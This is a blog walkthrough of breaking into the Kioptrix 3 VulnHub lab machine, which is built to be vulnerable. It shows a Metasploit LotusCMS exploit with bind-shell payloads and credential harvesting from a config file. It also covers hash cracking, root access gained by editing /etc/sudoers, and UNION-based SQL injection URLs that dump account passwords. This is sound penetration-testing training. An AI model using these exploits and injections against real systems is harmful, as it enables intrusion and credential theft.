WalkThrough! Kioptrix — 3 By VulnHub

Kamran Saifullah
8 min readMar 13, 2018

--

Hi,

I have been writing 2 WalkThroughs of the previous 2 Kioptrix machines and today i am writing this WalkThrough on Kioptrix 3 machine. I personally loved exploiting this machine and it was fun doing it. It was all about enumerating and enumerating and you are in.

To be very honest, Kioptrix machines are well designed according to their levels. It moves on from basics to advance and tests your knowledge accordingly. One can easily check his/her knowledge by exploiting these machines.

So let’s move forward;

The Kioptrix 3 can be downloaded from the below link and the mounting is the same as always.

https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

The first step is always to find the IP address of the machine and it is the same as always i.e;

netdiscover -i eth0

The next step was, “Port Scanning” using NMAP and NMAP showed me the below results.

Only 2 ports were up.

  1. SSH
  2. 80

As port 80 was running i knew that there is going to be a web application hosted on this machine. So i opened the IP address in the browser and found a web application running right on the IP address.

After this i quickly ran Nikto Web Server Vulnerability Assessment tool to look for any vulnerabilities and found these results;

From the results i found that Apache was appearing to be outdated as well as different directories. I found that phpmyadmin is up and it was so. I tried logging into it using default credentials though i failed. So i moved forward on exploring the web application. On the front page which can be seen below;

There was a blog and login panel right in the web application. I am always intended towards the login panel so i opened up the login panel and found it was running LotusCMS.

I tried using here some default credentials but none of them worked. Also i tried bypassing it using SQL string although they even didn’t worked. In my previous experiences with Kioptrix Machine i had concluded that at least one thing is vulnerable and particular exploit is also available. So i quickly ran;

searchsploit lotuscms

The exploit was available for LotusCMS. After this i opened metasploit;

msfconsole

Once loaded searched for the LotusCMS exploit;

search lotuscms

I found this exploit. So i used this exploit to test against the taget IP address to check whether we can successfully gain the meterpreter or not.

use exploit/multi/http/lcms_php_exec

show options

set rhost 192.168.97.136

set PAYLOAD generic/shell_bind_tcp

set URI /

set LHOST <ourIP>

exploit

w00t we got root. I mean we got the command shell.

Now running pwd and ls -la command along with lsb_release -a to look for the current path, path files and OS details.

Now grabbing the /etc/passwd file to look for the current users.

Ohkay fine. So the password are present in /etc/shadow as we are not the root user so we can’t open the file. Now let’s move forward to check the gallery i.e the new gallery we knew from the news that it is online now in order to check any sensitive files. So i ran;

ls -la gallery

Now we have the db.sql though we cannot open it. Although we can open the php files. So i closely looked on the php files and found one file named gconfig.php. After all this i tried opening this file although i wasn’t able to do it so.

So i though of changing the payload so that i can have the meterpreter session. So then i used the different payload which was;

set PAYLOAD php/meterpreter/bind_tcp

Then i ran the ‘exploit’ command again i gained the meterpreter reverse shell and now i can easily open, download and send the files from my machine to the target machine and from the target machine to my machine. So i moved into the gallery using;

cd /gallery

Then i ran;

cat gconfig.php

Boom i’ve found the phpmyadmin login credentials now.

So now let’s move onto logging into the PHPmyadmin using these credentials and yes we are now logged into the phpmyadmin

From here my main goal was to get the usernames and password so they were present here;

Now the issue here was that the passwords were hashed so it’s obvious we would have to crack these passwords. I remembered using a website for hash cracking so i quickly used it to look for the passwords.

hashkiller.co.uk

Yes…! i got the plain text password now i’m in B)

Now once we have the usernames and the passwords we can easily log into the machine using SSH so let’s give it a try….

Here we go, we are successfully logged via SSH service. Yayy! oh wait…….,

we have restricted access from this user.

Now what. Let’s log into the other account.

Fine for now. Let’s read what the Company Policy says??

So it says that “Please use the ‘sudo ht’ ;) Ohkay! so let’s find what is the location of this command?

Okayy! fine for now. Let’s try what ‘sudo ht’ really does?

So i got this error. As always google for your problems and i found;

https://stackoverflow.com/questions/6804208/nano-error-error-opening-terminal-xterm-256color

Simply had to use this in the terminal
export TERM=xterm

Now let’s run the ‘sudo ht’ command again :)

Here we go and this all works using Alt :P Ohkay now we had to load the file so that we can give this user the full access that is the admin/root rights. So ‘/etc/sudoers’ was the file :)

Now lets add ‘/bin/sh’ here.

So now let’s go back and try ‘sudo /bin/sh’.

That’s all. We have got the root access ;) wasn’t it easy….

I didn’t stopped here as i knew that the online gallery is still there and what is the reason for that. True? So i moved back on the main page after this. In the right moment i opened the blog the link was given.

So my next target was to take a look on the new gallery which is online. After scrolling the website i found that it was vulnerable to SQL Injection vulnerability. It took me few minutes to look for it. At last when i used the drop down menu at the page the link changed and got my eye. So i tested for Sql Injection vulnerability there.

How i knew it was vulnerable. It’s quite simple. I simply added (‘) and the error showed on the page. From where the rest of of exploitation has to be done.

So the first thing is to look for tables, then columns and then retrieving the data from those columns. I specifically hunted the users information. Just because i knew that it is the only way to get into the machine.

kioptrix.com/gallery/gallery.php?id=1 order by 6 — +-

kioptrix.com/gallery/gallery.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6— +-

Now let’s gather the tables information. Right!

kioptrix.com/gallery/gallery.php?id=-1 UNION ALL SELECT 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database() — +-

Let’s get the columns out of ‘dev_accounts’

kioptrix.com/gallery/gallery.php?id=-1 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name=CHAR(100, 101, 118, 95, 97, 99, 99, 111, 117, 110, 116, 115)— +-

Now let’s get the details out of these columns. Quite simple :)

kioptrix.com/gallery/gallery.php?id=-1 UNION ALL SELECT 1,group_concat(username,0x3a,password),3,4,5,6 from dev_accounts — +-

Here we go. We have got the username and the passwords. As we have done before. Crack these passwords. Log into the machine using ssh. Edit the ‘/etc/sudoers’. Run the sudo ‘/bin/sh’ and we are all done. This injection can be exploitable via SQLMAP. Well i didn’t used it as i do most of the things manually ;)

I hope you guys liked the WalkThrough!

Thanks.

--

--

Kamran Saifullah
Kamran Saifullah

Written by Kamran Saifullah

Malware/RE/Firmware Analysis, App Sec/Off Sec, VAPT, Phishing Simulations/SE | Risk Management, IS Governance, Audits, ISO 27001 LI

No responses yet